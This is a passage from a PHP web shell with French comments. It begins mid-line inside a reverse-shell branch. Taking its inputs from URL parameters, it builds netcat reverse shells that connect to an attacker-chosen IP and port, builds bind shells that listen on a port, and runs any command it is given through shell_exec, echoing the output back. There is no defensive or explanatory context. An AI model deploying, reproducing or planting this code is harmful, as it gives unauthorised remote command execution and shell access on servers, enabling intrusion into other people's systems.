&1|nc ".$_GET['ip']." ".$_GET['port']." >/tmp/f";
}
// Reverse shell: nc avec -e
if (isset($_GET['nce'])) {
$cmd = "/bin/bash -c 'nc -e /bin/bash ".$_GET['ip']." ".$_GET['port']."'";
}
// Bind shell: nc avec -e
if (isset($_GET['bnce'])) {
$cmd = "/bin/bash -c 'nc -e /bin/bash -lvp ".$_GET['port']."'";
}
// Bind shell: nc sans -e
if (isset($_GET['bnc'])) {
$cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh 2>&1|nc -lp ".$_GET['port']." >/tmp/f";
}
// Commande
if (isset($_GET['execute'])) {
$cmd = $_GET['cmd'];
}
//
// On execute
if (isset($cmd)) {
$htmlcmd = "
==> ".$cmd."
";
$output = shell_exec($cmd);
$output = htmlspecialchars($output);
$output = nl2br($output);
$cmdhistory = $_GET['cmdoutput']."
".$htmlcmd.$output;
echo ($cmdhistory);
} else {
$cmdhistory = $_GET['cmdoutput'];
echo ($cmdhistory);
}
?>